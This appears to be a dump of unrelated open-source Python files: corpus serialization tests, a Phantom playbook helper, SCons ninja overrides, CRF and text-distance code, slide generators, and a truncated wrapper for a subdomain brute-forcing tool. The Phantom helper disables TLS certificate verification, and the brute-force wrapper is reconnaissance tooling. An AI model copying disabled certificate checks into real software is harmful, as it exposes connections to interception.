def test_serialize(self):
corpus = self.TEST_CORPUS
# make sure the corpus can be saved
self.corpus_class.serialize(testfile(), corpus)
# and loaded back, resulting in exactly the same corpus
corpus2 = self.corpus_class(testfile())
self.assertEqual(corpus, list(corpus2))
# make sure the indexing corpus[i] works
for i in range(len(corpus)):
self.assertEqual(corpus[i], corpus2[i])
def test_serialize_compressed(self):
corpus = self.TEST_CORPUS
for extension in ['.gz', '.bz2']:
fname = testfile() + extension
# make sure the corpus can be saved
self.corpus_class.serialize(fname, corpus)
# and loaded back, resulting in exactly the same corpus
corpus2 = self.corpus_class(fname)
self.assertEqual(corpus, list(corpus2))
# make sure the indexing `corpus[i]` syntax works
for i in range(len(corpus)):
self.assertEqual(corpus[i], corpus2[i])
# endclass CorpusTestCase
class TestMmCorpus(CorpusTestCase):
def setUp(self):
self.corpus_class = mmcorpus.MmCorpus
self.file_extension = '.mm'
def test_serialize_compressed(self):
# MmCorpus needs file write with seek => doesn't support compressed output (only input)
pass
# endclass TestMmCorpus
class TestSvmLightCorpus(CorpusTestCase):
def setUp(self):
self.corpus_class = svmlightcorpus.SvmLightCorpus
self.file_extension = '.svmlight'
# endclass TestSvmLightCorpus
class TestBleiCorpus(CorpusTestCase):
def setUp(self):
self.corpus_class = bleicorpus.BleiCorpus
self.file_extension = '.blei'
# endclass TestBleiCorpus
class TestLowCorpus(CorpusTestCase):
TEST_CORPUS = [[(1, 1)], [], [(0, 2), (2, 1)], []]
def setUp(self):
self.corpus_class = lowcorpus.LowCorpus
self.file_extension = '.low'
# endclass TestLowCorpus
class TestUciCorpus(CorpusTestCase):
TEST_CORPUS = [[(1, 1)], [], [(0, 2), (2, 1)], []]
def setUp(self):
self.corpus_class = ucicorpus.UciCorpus
self.file_extension = '.uci'
def test_serialize_compressed(self):
# UciCorpus needs file write with seek => doesn't support compressed output (only input)
pass
# endclass TestUciCorpus
class TestMalletCorpus(CorpusTestCase):
TEST_CORPUS = [[(1, 1)], [], [(0, 2), (2, 1)], []]
def setUp(self):
self.corpus_class = malletcorpus.MalletCorpus
self.file_extension = '.mallet'
def test_load_with_metadata(self):
fname = datapath('testcorpus.' + self.file_extension.lstrip('.'))
corpus = self.corpus_class(fname)
corpus.metadata = True
self.assertEqual(len(corpus), 9)
docs = list(corpus)
self.assertEqual(len(docs), 9)
for i, docmeta in enumerate(docs):
doc, metadata = docmeta
self.assertEqual(metadata[0], str(i + 1))
self.assertEqual(metadata[1], 'en')
# endclass TestMalletCorpus
class TestTextCorpus(CorpusTestCase):
def setUp(self):
self.corpus_class = textcorpus.TextCorpus
self.file_extension = '.txt'
def test_load_with_metadata(self):
fname = datapath('testcorpus.' + self.file_extension.lstrip('.'))
corpus = self.corpus_class(fname)
corpus.metadata = True
self.assertEqual(len(corpus), 9)
docs = list(corpus)
self.assertEqual(len(docs), 9)
for i, docmeta in enumerate(docs):
doc, metadata = docmeta
self.assertEqual(metadata[0], i)
def test_save(self):
pass
def test_serialize(self):
pass
def test_serialize_compressed(self):
pass
# endclass TestTextCorpus
if __name__ == '__main__':
logging.basicConfig(level=logging.DEBUG)
unittest.main()
|
playbooks/custom_functions/custom_list_enumerate.py | arjunkhunti-crest/security_content | 348 | 11178829 | def custom_list_enumerate(custom_list=None, **kwargs):
"""
Fetch a custom list and iterate through the rows, producing a dictionary output for each row with the row number and the value for each column.
Args:
custom_list: the name or ID of a custom list
Returns a JSON-serializable object that implements the configured data paths:
*.row_num
*.column_0
*.column_1
*.column_2
*.column_3
*.column_4
*.column_5
*.column_6
*.column_7
*.column_8
"""
############################ Custom Code Goes Below This Line #################################
import json
import phantom.rules as phantom
if not custom_list:
raise ValueError('list_name_or_num parameter is required')
outputs = []
# Use REST to get the custom list
custom_list_request = phantom.requests.get(
phantom.build_phantom_rest_url('decided_list', custom_list),
verify=False
)
# Raise error if unsuccessful
custom_list_request.raise_for_status()
# Get the list content
custom_list = custom_list_request.json().get('content', [])
# Iterate through all rows and save to a list of dicts
for row_num, row in enumerate(custom_list):
row_dict = {'column_{}'.format(col): val for col, val in enumerate(row)}
row_dict['row_num'] = row_num
outputs.append(row_dict)
# Return a JSON-serializable object
assert json.dumps(outputs) # Will raise an exception if the :outputs: object is not JSON-serializable
return outputs
|
SCons/Tool/ninja/Overrides.py | jcassagnol-public/scons | 1,403 | 11178846 | <gh_stars>1000+
# MIT License
#
# Copyright The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
This module is to hold logic which overrides default SCons behaviors to enable
ninja file generation
"""
import SCons
def ninja_hack_linkcom(env):
# TODO: change LINKCOM and SHLINKCOM to handle embedding manifest exe checks
# without relying on the SCons hacks that SCons uses by default.
if env["PLATFORM"] == "win32":
from SCons.Tool.mslink import compositeLinkAction
if env.get("LINKCOM", None) == compositeLinkAction:
env[
"LINKCOM"
] = '${TEMPFILE("$LINK $LINKFLAGS /OUT:$TARGET.windows $_LIBDIRFLAGS $_LIBFLAGS $_PDB $SOURCES.windows", "$LINKCOMSTR")}'
env[
"SHLINKCOM"
] = '${TEMPFILE("$SHLINK $SHLINKFLAGS $_SHLINK_TARGETS $_LIBDIRFLAGS $_LIBFLAGS $_PDB $_SHLINK_SOURCES", "$SHLINKCOMSTR")}'
def ninja_hack_arcom(env):
"""
Force ARCOM so use 's' flag on ar instead of separately running ranlib
"""
if env["PLATFORM"] != "win32" and env.get("RANLIBCOM"):
# There is no way to translate the ranlib list action into
# Ninja so add the s flag and disable ranlib.
#
# This is equivalent to Meson.
# https://github.com/mesonbuild/meson/blob/master/mesonbuild/linkers.py#L143
old_arflags = str(env["ARFLAGS"])
if "s" not in old_arflags:
old_arflags += "s"
env["ARFLAGS"] = SCons.Util.CLVar([old_arflags])
# Disable running ranlib, since we added 's' above
env["RANLIBCOM"] = ""
class NinjaNoResponseFiles(SCons.Platform.TempFileMunge):
"""Overwrite the __call__ method of SCons' TempFileMunge to not delete."""
def __call__(self, target, source, env, for_signature):
return self.cmd
def _print_cmd_str(*_args, **_kwargs):
"""Disable this method"""
pass
def ninja_always_serial(self, num, taskmaster):
"""Replacement for SCons.Job.Jobs constructor which always uses the Serial Job class."""
# We still set self.num_jobs to num even though it's a lie. The
# only consumer of this attribute is the Parallel Job class AND
# the Main.py function which instantiates a Jobs class. It checks
# if Jobs.num_jobs is equal to options.num_jobs, so if the user
# provides -j12 but we set self.num_jobs = 1 they get an incorrect
# warning about this version of Python not supporting parallel
# builds. So here we lie so the Main.py will not give a false
# warning to users.
self.num_jobs = num
self.job = SCons.Job.Serial(taskmaster)
# pylint: disable=too-few-public-methods
class AlwaysExecAction(SCons.Action.FunctionAction):
"""Override FunctionAction.__call__ to always execute."""
def __call__(self, *args, **kwargs):
kwargs["execute"] = 1
return super().__call__(*args, **kwargs)
|
quantdsl/domain/model/call_dependents.py | johnbywater/quantdsl | 269 | 11178853 | from eventsourcing.domain.model.entity import EventSourcedEntity, EntityRepository
from eventsourcing.domain.model.events import publish
class CallDependents(EventSourcedEntity):
"""
Call dependents are the calls that are waiting for this call to be evaluated.
The number of dependents will be the number of reuses of this call from the call
cache. Looking at the call dependents therefore gives a good idea of whether
recombination in a lattice is working properly.
"""
class Created(EventSourcedEntity.Created):
pass
class Discarded(EventSourcedEntity.Discarded):
pass
def __init__(self, dependents, **kwargs):
super(CallDependents, self).__init__(**kwargs)
self._dependents = dependents
def __getitem__(self, item):
return self._dependents.__getitem__(item)
@property
def dependents(self):
return self._dependents
def register_call_dependents(call_id, dependents):
created_event = CallDependents.Created(entity_id=call_id, dependents=dependents)
call_dependents = CallDependents.mutator(event=created_event)
# print("Number of call dependents:", len(dependents))
publish(created_event)
return call_dependents
class CallDependentsRepository(EntityRepository):
pass
|
tests/test_injectable_marker.py | wetgi/lagom | 109 | 11178875 | <filename>tests/test_injectable_marker.py<gh_stars>100-1000
from copy import deepcopy
import pytest
from lagom import injectable
from lagom.exceptions import InjectableNotResolved
def test_injectable_is_falsy():
assert not injectable
def test_trying_to_reference_a_property_on_injectable_raises_an_error():
with pytest.raises(InjectableNotResolved):
injectable.some_value # type: ignore
def test_trying_to_call_things_on_injectable_raises_an_error():
with pytest.raises(InjectableNotResolved):
injectable.do_thing() # type: ignore
def test_cloning_injectable_is_the_same_injectable():
assert injectable is deepcopy(injectable)
|
images/merge-svgs.py | ragerdl/dtrace-stap-book | 139 | 11178876 | <filename>images/merge-svgs.py
import os
import sys
import xml.etree.ElementTree as etree
NAMESPACES = {
'': 'http://www.w3.org/2000/svg',
'xlink': 'http://www.w3.org/1999/xlink',
'sodipodi': 'http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd',
'inkscape': 'http://www.inkscape.org/namespaces/inkscape'
}
def _xml_tag(tag, ns=''):
return '{{{0}}}{1}'.format(NAMESPACES[ns], tag)
# Parse args and process
target = sys.argv[1]
source = sys.argv[2]
extrasvgs = dict((os.path.basename(fname), fname)
for fname in sys.argv[3:])
for ns, uri in NAMESPACES.items():
etree.register_namespace(ns, uri)
# Parse main image
tree = etree.parse(source)
root = tree.getroot()
for group in root.findall('.//' + _xml_tag('g')):
use = group.find(_xml_tag('use'))
if use is None:
continue
href = use.attrib[_xml_tag('href', 'xlink')]
if href not in extrasvgs:
raise ValueError('Invalid use reference {0}'.format(href))
group.clear()
# Read sub svg
extrasvg = etree.parse(extrasvgs[href]).getroot()
extragroup = extrasvg.find(_xml_tag('g'))
if extragroup is not None:
group.extend(extragroup)
tree.write(target) |
src/uvm/dap/uvm_set_get_dap_base.py | rodrigomelo9/uvm-python | 140 | 11178911 | <reponame>rodrigomelo9/uvm-python
#//
#//------------------------------------------------------------------------------
#// Copyright 2007-2011 Mentor Graphics Corporation
#// Copyright 2007-2011 Cadence Design Systems, Inc.
#// Copyright 2010-2011 Synopsys, Inc.
#// Copyright 2013 NVIDIA Corporation
#// All Rights Reserved Worldwide
#//
#// Licensed under the Apache License, Version 2.0 (the
#// "License"); you may not use this file except in
#// compliance with the License. You may obtain a copy of
#// the License at
#//
#// http://www.apache.org/licenses/LICENSE-2.0
#//
#// Unless required by applicable law or agreed to in
#// writing, software distributed under the License is
#// distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
#// CONDITIONS OF ANY KIND, either express or implied. See
#// the License for the specific language governing
#// permissions and limitations under the License.
#//------------------------------------------------------------------------------
from ..base.uvm_object import UVMObject
#// Class: uvm_set_get_dap_base
#// Provides the 'set' and 'get' interface for Data Access Policies (DAPs)
#//
#// The 'Set/Get' base class simply provides a common interface for
#// the various DAPs to implement. This provides a mechanism for
#// consistent implementations of similar DAPs.
#//
#virtual class uvm_set_get_dap_base#(type T=int) extends uvm_object;
class uvm_set_get_dap_base(UVMObject):
def __init__(self, name="unnamed-uvm_set_get_dap_base#(T)"):
UVMObject.__init__(self, name)
# // Group: Set/Get Interface
# //
# // All implementations of the ~uvm_set_get_dap_base~ class must
# // provide an implementation of the four basic "Set and Get"
# // accessors.
# //
# // Function: set
# // Sets the value contained within the resource.
# //
# // Depending on the DAP policies, an error may be reported if
# // it is illegal to 'set' the value at this time.
# pure virtual function void set(T value);
def set(self, value):
raise NotImplementedError('Pure virtual function')
# // Function: try_set
# // Attempts to set the value contained within the resource.
# //
# // If the DAP policies forbid setting at this time, then
# // the method will return 0, however no errors will be
# // reported. Otherwise, the method will return 1, and
# // will be treated like a standard <set> call.
# pure virtual function bit try_set(T value);
def try_set(self, value):
raise NotImplementedError('Pure virtual function')
# // Function: get
# // Retrieves the value contained within the resource.
# //
# // Depending on the DAP policies, an error may be reported
# // if it is illegal to 'get' the value at this time.
# pure virtual function T get();
def get(self):
raise NotImplementedError('Pure virtual function')
# // Function: try_get
# // Attempts to retrieve the value contained within the resource.
# //
# // If the DAP policies forbid retrieving at this time, then
# // the method will return 0, however no errors will be
# // reported. Otherwise, the method will return 1, and will
# // be treated like a standard <get> call.
# pure virtual function bit try_get(output T value);
def try_get(self, value):
raise NotImplementedError('Pure virtual function')
|
textdistance/algorithms/vector_based.py | juliangilbey/textdistance | 1,401 | 11178984 | <reponame>juliangilbey/textdistance
"""
IMPORTANT: it's just draft
"""
# built-in
from functools import reduce
# app
from .base import Base as _Base, BaseSimilarity as _BaseSimilarity
try:
import numpy
except ImportError:
numpy = None
class Chebyshev(_Base):
def _numpy(self, s1, s2):
s1, s2 = numpy.asarray(s1), numpy.asarray(s2)
return max(abs(s1 - s2))
def _pure(self, s1, s2):
return max(abs(e1 - e2) for e1, e2 in zip(s1, s2))
def __call__(self, s1, s2):
if numpy:
return self._numpy(s1, s2)
else:
return self._pure(s1, s2)
class Minkowski(_Base):
def __init__(self, p=1, weight=1):
if p < 1:
raise ValueError('p must be at least 1')
self.p = p
self.weight = weight
def _numpy(self, s1, s2):
s1, s2 = numpy.asarray(s1), numpy.asarray(s2)
result = (self.weight * abs(s1 - s2)) ** self.p
return result.sum() ** (1.0 / self.p)
def _pure(self, s1, s2):
result = (self.weight * abs(e1 - e2) for e1, e2 in zip(s1, s2))
result = sum(e ** self.p for e in result)
return result ** (1.0 / self.p)
def __call__(self, s1, s2):
if numpy:
return self._numpy(s1, s2)
else:
return self._pure(s1, s2)
class Manhattan(_Base):
def __call__(self, s1, s2):
raise NotImplementedError
class Euclidean(_Base):
def __init__(self, squared=False):
self.squared = squared
def _numpy(self, s1, s2):
s1 = numpy.asarray(s1)
s2 = numpy.asarray(s2)
q = numpy.matrix(s1 - s2)
result = (q * q.T).sum()
if self.squared:
return result
return numpy.sqrt(result)
def _pure(self, s1, s2):
raise NotImplementedError
def __call__(self, s1, s2):
if numpy:
return self._numpy(s1, s2)
else:
return self._pure(s1, s2)
class Mahalanobis(_Base):
def __call__(self, s1, s2):
raise NotImplementedError
class Correlation(_BaseSimilarity):
def _numpy(self, *sequences):
sequences = [numpy.asarray(s) for s in sequences]
ssm = [s - s.mean() for s in sequences]
result = reduce(numpy.dot, sequences)
for sm in ssm:
result /= numpy.sqrt(numpy.dot(sm, sm))
return result
def _pure(self, *sequences):
raise NotImplementedError
def __call__(self, *sequences):
if numpy:
return self._numpy(*sequences)
else:
return self._pure(*sequences)
class Kulsinski(_BaseSimilarity):
def __call__(self, s1, s2):
raise NotImplementedError
|
bindings/python/examples/linear_crf.py | shubho/gtn | 478 | 11179054 | #!/usr/bin/env python3
"""
Copyright (c) Facebook, Inc. and its affiliates.
This source code is licensed under the MIT license found in the
LICENSE file in the root directory of this source tree.
"""
import gtn
import numpy as np
def gen_transitions(num_classes, calc_grad=False):
"""Make a bigram transition graph."""
g = gtn.Graph(calc_grad)
for i in range(num_classes):
g.add_node(False, True)
g.add_node(True, True)
for i in range(num_classes):
g.add_arc(num_classes, i, i) # s(<s>, i)
for j in range(num_classes):
g.add_arc(i, j, j) # s(i, j)
return g
def gen_potentials(num_features, num_classes, calc_grad=False):
"""Make the unary potential graph"""
g = gtn.Graph(calc_grad)
g.add_node(True, True)
for i in range(num_features):
for c in range(num_classes):
g.add_arc(0, 0, i, c) # f(i, c)
return g
def gen_model(num_features, num_classes, calc_grad=False, init=True):
transitions = gen_transitions(num_classes, calc_grad)
potentials = gen_potentials(num_features, num_classes, calc_grad)
# Randomly set the arc weights of the graphs:
if init:
transitions.set_weights(
10 * np.random.randn(transitions.num_arcs()))
potentials.set_weights(
10 * np.random.randn(potentials.num_arcs()))
return potentials, transitions
def make_chain_graph(seq, calc_grad=False):
"""Make a simple chain graph from an iterable of integers."""
g = gtn.Graph(calc_grad)
g.add_node(True)
for e, s in enumerate(seq):
g.add_node(False, e + 1 == len(seq))
g.add_arc(e, e + 1, s)
return g
def sample_model(
num_features, num_classes,
potentials, transitions,
num_samples, max_len=20):
"""
Sample `num_samples` from a linear-chain CRF specified
by a `potentials` graph and a `transitions` graph. The
samples will have a random length in `[1, max_len]`.
"""
model = gtn.compose(potentials, transitions)
# Draw a random X with length randomly from [1, max_len] and find the
# most likely Y under the model:
samples = []
while len(samples) < num_samples:
# Sample X:
T = np.random.randint(1, max_len + 1)
X = np.random.randint(0, num_features, size=(T,))
X = make_chain_graph(X)
# Find the most likely Y given X:
Y = gtn.viterbi_path(gtn.compose(X, model))
# Clean up Y:
Y = gtn.project_output(Y)
Y.set_weights(np.zeros(Y.num_arcs()))
samples.append((X, Y))
return samples
def crf_loss(X, Y, potentials, transitions):
feature_graph = gtn.compose(X, potentials)
# Compute the unnormalized score of `(X, Y)`
target_graph = gtn.compose(feature_graph, gtn.intersect(Y, transitions))
target_score = gtn.forward_score(target_graph)
# Compute the partition function
norm_graph = gtn.compose(feature_graph, transitions)
norm_score = gtn.forward_score(norm_graph)
return gtn.subtract(norm_score, target_score)
def update_params(learning_rate, *graphs):
"""Take a gradient step on each graph in `graphs`."""
for graph in graphs:
params = graph.weights_to_numpy()
grad = graph.grad().weights_to_numpy()
params += learning_rate * grad
graph.set_weights(params)
def sampler(dataset):
"""Iterator which randomly samples from a dataset."""
while True:
indices = np.random.permutation(len(dataset))
for idx in indices:
yield dataset[idx]
def main():
num_features = 3 # number of input features
num_classes = 2 # number of output classes
num_train = 1000 # size of the training set
num_test = 200 # size of the testing set
# Setup ground-truth model:
gt_potentials, gt_transitions = gen_model(num_features, num_classes)
# Sample training and test datasets:
samples = sample_model(
num_features, num_classes,
gt_potentials, gt_transitions,
num_train + num_test)
train, test = samples[:num_train], samples[num_train:]
print(f"Using {len(train)} samples for the training set")
print(f"Using {len(test)} samples for the test set")
# Make the graphs for learning:
potentials, transitions = gen_model(
num_features, num_classes, calc_grad=True, init=False)
print("Unary potential graph has {} nodes and {} arcs".format(
potentials.num_nodes(), potentials.num_arcs()))
print("Transition graph has {} nodes and {} arcs".format(
transitions.num_nodes(), transitions.num_arcs()))
# Make the graphs to be learned:
potentials, transitions = gen_model(
num_features, num_classes, calc_grad=True, init=False)
# Run the SGD loop:
learning_rate = 1e-2
max_iter = 10000
losses = []
for it, (X, Y) in enumerate(sampler(train)):
# Compute the loss and take a gradient step:
loss = crf_loss(X, Y, potentials, transitions)
gtn.backward(loss)
update_params(-learning_rate, potentials, transitions)
# Clear the gradients:
transitions.zero_grad()
potentials.zero_grad()
losses.append(loss.item())
if (it + 1) % 1000 == 0:
print("=" * 50)
print(f"Iteration {it + 1}, Avg. Loss {np.mean(losses):.3f}")
losses = []
if it == max_iter:
break
# Evaluate on the test set:
correct = 0.0
total = 0
for X, Y in test:
full_graph = gtn.compose(gtn.compose(X, potentials), transitions)
prediction = gtn.viterbi_path(full_graph).labels_to_list(False)
correct += np.sum(np.array(Y.labels_to_list()) == prediction)
total += len(prediction)
print("Test: Accuracy {:.3f}".format(correct / total))
if __name__ == "__main__":
main()
|
talkgenerator/slide/slide_generator_types.py | korymath/talk-generator | 110 | 11179060 | <gh_stars>100-1000
import logging
from abc import ABCMeta
from abc import abstractmethod
from talkgenerator.slide import slides
from talkgenerator.util import generator_util
logger = logging.getLogger("talkgenerator")
class SlideGenerator(metaclass=ABCMeta):
""" Generating Slide objects using a list of generators """
def __init__(self, slide_content_generator):
""" The given content_providers is a function that when called,
generates all of the arguments for the slide creator"""
self._slide_content_generator = slide_content_generator
@property
@abstractmethod
def slide_type(self):
""" The function converting it to a Slide object """
pass
@classmethod
def of(cls, *generators):
return cls(CombinedSlideGenerator(*generators))
def generate_slide(self, presentation_context, used) -> (slides.Slide, list):
""" Generates the slide using the given generators."""
logger.debug('slide_generator_types.generate_slide')
logger.debug('presentation_context: {}'.format(presentation_context))
logger.debug('self._slide_content_generator: {}'.format(self._slide_content_generator))
generated = self._slide_content_generator(presentation_context)
logger.debug('generated: {}'.format(generated))
if is_different_enough(generated, used):
return self.slide_type(*generated), generated
class TitleSlideGenerator(SlideGenerator):
def __init__(self, slide_content_generator):
super().__init__(slide_content_generator)
@classmethod
def of(cls, title_generator, subtitle_generator):
return cls(CombinedSlideGenerator(title_generator, subtitle_generator))
@property
def slide_type(self):
return slides.TitleSlide
class LarqeQuoteSlideGenerator(SlideGenerator):
def __init__(self, slide_content_generator):
super().__init__(slide_content_generator)
@classmethod
def of(cls, title_generator, text_generator, background_image_generator):
return cls(
CombinedSlideGenerator(
title_generator, text_generator, background_image_generator
)
)
@property
def slide_type(self):
return slides.LarqeQuoteSlide
class ImageSlideGenerator(SlideGenerator):
def __init__(self, slide_content_generator):
super().__init__(slide_content_generator)
@classmethod
def of(cls, title_generator, image_generator=None, original_image_size=True):
return cls(
CombinedSlideGenerator(
title_generator,
image_generator,
generator_util.StaticGenerator(original_image_size),
)
)
@classmethod
def of_tupled_captioned_image(cls, tuple_1_generator, original_image_size=True):
return cls(
TupledCaptionedImageGenerator(tuple_1_generator, original_image_size)
)
@property
def slide_type(self):
return slides.ImageSlide
class TupledCaptionedImageGenerator(object):
def __init__(self, tuple_1_generator, original_image_size=True):
self._tuple_1_generator = tuple_1_generator
self._original_image_size = original_image_size
def __call__(self, presentation_context):
generated_tuple_1 = self._tuple_1_generator(presentation_context)
return generated_tuple_1[0], generated_tuple_1[1], self._original_image_size
class FullImageSlideGenerator(SlideGenerator):
def __init__(self, slide_content_generator):
super().__init__(slide_content_generator)
@classmethod
def of(cls, title_generator, image_generator=None, original_image_size=True):
return cls(
CombinedSlideGenerator(
title_generator,
image_generator,
generator_util.StaticGenerator(original_image_size),
)
)
@property
def slide_type(self):
return slides.FullImageSlide
class TwoColumnImageSlideGenerator(SlideGenerator):
def __init__(self, slide_content_generator):
super().__init__(slide_content_generator)
@classmethod
def of(
cls,
title_generator,
caption_1_generator,
image_or_text_1_generator,
caption_2_generator,
image_or_text_2_generator,
original_image_size=True,
):
return cls(
CombinedSlideGenerator(
title_generator,
caption_1_generator,
image_or_text_1_generator,
caption_2_generator,
image_or_text_2_generator,
generator_util.StaticGenerator(original_image_size),
)
)
@classmethod
def of_tupled_captioned_images(
cls,
title_generator,
tuple_1_generator,
tuple_2_generator,
original_image_size=True,
):
return cls(
TwoTupledCaptionedImagesGenerator(
title_generator,
tuple_1_generator,
tuple_2_generator,
original_image_size,
)
)
@classmethod
def of_images_and_tupled_captions(
cls,
title_generator,
captions_generator,
image_1_generator,
image_2_generator,
original_image_size=True,
):
return cls(
TwoImagesAndTupledCaptions(
title_generator,
captions_generator,
image_1_generator,
image_2_generator,
original_image_size,
)
)
@property
def slide_type(self):
return slides.TwoColumnImageSlide
class TwoTupledCaptionedImagesGenerator(SlideGenerator):
def __init__(
self,
title_generator,
tuple_1_generator,
tuple_2_generator,
original_image_size=True,
):
super().__init__(self)
self._title_generator = title_generator
self._tuple_1_generator = tuple_1_generator
self._tuple_2_generator = tuple_2_generator
self._original_image_size = original_image_size
def __call__(self, presentation_context):
generated_tuple_1 = self._tuple_1_generator(presentation_context)
generated_tuple_2 = self._tuple_2_generator(presentation_context)
return (
self._title_generator(presentation_context),
generated_tuple_1[0],
generated_tuple_1[1],
(generated_tuple_2[0]),
generated_tuple_2[1],
self._original_image_size,
)
@property
def slide_type(self):
return slides.TwoColumnImageSlide
class TwoImagesAndTupledCaptions(SlideGenerator):
def __init__(
self,
title_generator,
captions_generator,
image_1_generator,
image_2_generator,
original_image_size=True,
):
super().__init__(self)
logger.debug('initializing TwoImagesAndTupledCaptions')
self._title_generator = title_generator
self._captions_generator = captions_generator
self._image_1_generator = image_1_generator
self._image_2_generator = image_2_generator
self._original_image_size = original_image_size
def __call__(self, presentation_context):
logger.debug('Calling TwoImagesAndTupledCaptions')
logger.debug('**********************************')
logger.debug('presentation_context: {}'.format(presentation_context))
logger.debug('captions_generator: {}'.format(self._captions_generator))
logger.debug('original_image_size: {}'.format(self._original_image_size))
generated_tuple = self._captions_generator(presentation_context)
logger.debug('generated_tuple: {}'.format(generated_tuple))
logger.debug('title_generator: {}'.format(self._title_generator))
_title = self._title_generator(presentation_context)
logger.debug('_title: {}'.format(_title))
logger.debug('image_1_generator: {}'.format(self._image_1_generator))
_image1 = self._image_1_generator(presentation_context)
logger.debug('_image1: {}'.format(_image1))
logger.debug('image_2_generator: {}'.format(self._image_2_generator))
_image2 = self._image_2_generator(presentation_context)
logger.debug('_image2: {}'.format(_image2))
return (
_title,
generated_tuple[0],
_image1,
generated_tuple[1],
_image2,
self._original_image_size,
)
@property
def slide_type(self):
return slides.TwoColumnImageSlide
class ThreeColumnImageSlideGenerator(SlideGenerator):
def __init__(self, slide_content_generator):
super().__init__(slide_content_generator)
@classmethod
def of(
cls,
title_generator,
caption_1_generator,
image_or_text_1_generator,
caption_2_generator,
image_or_text_2_generator,
caption_3_generator,
image_or_text_3_generator,
original_image_size=True,
):
return cls(
CombinedSlideGenerator(
title_generator,
caption_1_generator,
image_or_text_1_generator,
caption_2_generator,
image_or_text_2_generator,
caption_3_generator,
image_or_text_3_generator,
generator_util.StaticGenerator(original_image_size),
)
)
@classmethod
def of_tupled_captioned_images(
cls,
title_generator,
tuple_1_generator,
tuple_2_generator,
tuple_3_generator,
original_image_size=True,
):
return cls(
ThreeTupledCaptionedImagesGenerator(
title_generator,
tuple_1_generator,
tuple_2_generator,
tuple_3_generator,
original_image_size,
)
)
@classmethod
def of_images_and_tupled_captions(
cls,
title_generator,
captions_generator,
image_1_generator,
image_2_generator,
image_3_generator,
original_image_size=True,
):
return cls(
ThreeImagesAndTupledCaptions(
title_generator,
captions_generator,
image_1_generator,
image_2_generator,
image_3_generator,
original_image_size,
)
)
@property
def slide_type(self):
return slides.ThreeColumnImageSlide
class ThreeTupledCaptionedImagesGenerator(SlideGenerator):
def __init__(
self,
title_generator,
tuple_1_generator,
tuple_2_generator,
tuple_3_generator,
original_image_size=True,
):
super().__init__(self)
self._title_generator = title_generator
self._tuple_1_generator = tuple_1_generator
self._tuple_2_generator = tuple_2_generator
self._tuple_3_generator = tuple_3_generator
self._original_image_size = original_image_size
def __call__(self, presentation_context):
generated_tuple_1 = self._tuple_1_generator(presentation_context)
generated_tuple_2 = self._tuple_2_generator(presentation_context)
generated_tuple_3 = self._tuple_3_generator(presentation_context)
return (
self._title_generator(presentation_context),
generated_tuple_1[0],
generated_tuple_1[1],
(generated_tuple_2[0]),
generated_tuple_2[1],
generated_tuple_3[0],
generated_tuple_3[1],
self._original_image_size,
)
@property
def slide_type(self):
return slides.ThreeColumnImageSlide
class ThreeImagesAndTupledCaptions(SlideGenerator):
def __init__(
self,
title_generator,
captions_generator,
image_1_generator,
image_2_generator,
image_3_generator,
original_image_size=True,
):
super().__init__(self)
self._title_generator = title_generator
self._captions_generator = captions_generator
self._image_1_generator = image_1_generator
self._image_2_generator = image_2_generator
self._image_3_generator = image_3_generator
self._original_image_size = original_image_size
def __call__(self, presentation_context):
generated_tuple = self._captions_generator(presentation_context)
return (
self._title_generator(presentation_context),
generated_tuple[0],
self._image_1_generator(presentation_context),
generated_tuple[1],
self._image_2_generator(presentation_context),
generated_tuple[2],
self._image_3_generator(presentation_context),
self._original_image_size,
)
@property
def slide_type(self):
return slides.ThreeColumnImageSlide
class ChartSlideGenerator(SlideGenerator):
def __init__(self, slide_content_generator):
super().__init__(slide_content_generator)
@classmethod
def of(
cls,
title_generator,
chart_type_generator,
chart_data_generator,
chart_modifier=None,
):
return cls(
CombinedSlideGenerator(
title_generator,
chart_type_generator,
chart_data_generator,
generator_util.StaticGenerator(chart_modifier),
)
)
@property
def slide_type(self):
return slides.ChartSlide
# HELPERS
class CombinedSlideGenerator(object):
def __init__(self, *generators):
# print("CombinedGenerator:", self, generators)
self._generators = generators
def __call__(self, presentation_context):
# print("CombinedGenerator:", self)
return [
content_generator(presentation_context) if content_generator else None
for content_generator in self._generators
]
def is_different_enough(generated, used):
(used_elements, allowed_repeated_elements) = used
return is_different_enough_for_allowed_repeated(
generated, used_elements, allowed_repeated_elements
)
def is_different_enough_for_allowed_repeated(
generated, used_elements, allowed_repeated_elements
):
if generated:
if not used_elements:
return True
intersection = set(generated) & used_elements
return allowed_repeated_elements >= len(intersection)
return False
|
mmrotate/core/anchor/builder.py | williamcorsel/mmrotate | 449 | 11179074 | <reponame>williamcorsel/mmrotate<filename>mmrotate/core/anchor/builder.py
# Copyright (c) OpenMMLab. All rights reserved.
from mmcv.utils import build_from_cfg
from mmdet.core.anchor.builder import ANCHOR_GENERATORS
ROTATED_ANCHOR_GENERATORS = ANCHOR_GENERATORS
def build_prior_generator(cfg, default_args=None):
return build_from_cfg(cfg, ROTATED_ANCHOR_GENERATORS, default_args)
|
Bruteapi.py | Yang2635/telescope | 699 | 11179077 | #encoding=utf8
from brutedns import Brutedomain
class cmd_args:
def __init__(self):
self.domain=''
self.speed=''
self.level=''
self.cdn = ''
self.sub_dict=''
self.next_sub_dict =''
self.default_dns = ''
self.other_result=''
class Brute_subdomain_api:
def run(self,domain, speed, level,default_dns,cdn,sub_dict,next_sub_dict,other_file):
cmd_args.domain = domain
cmd_args.speed = speed
cmd_args.level = level
cmd_args.sub_file = sub_dict
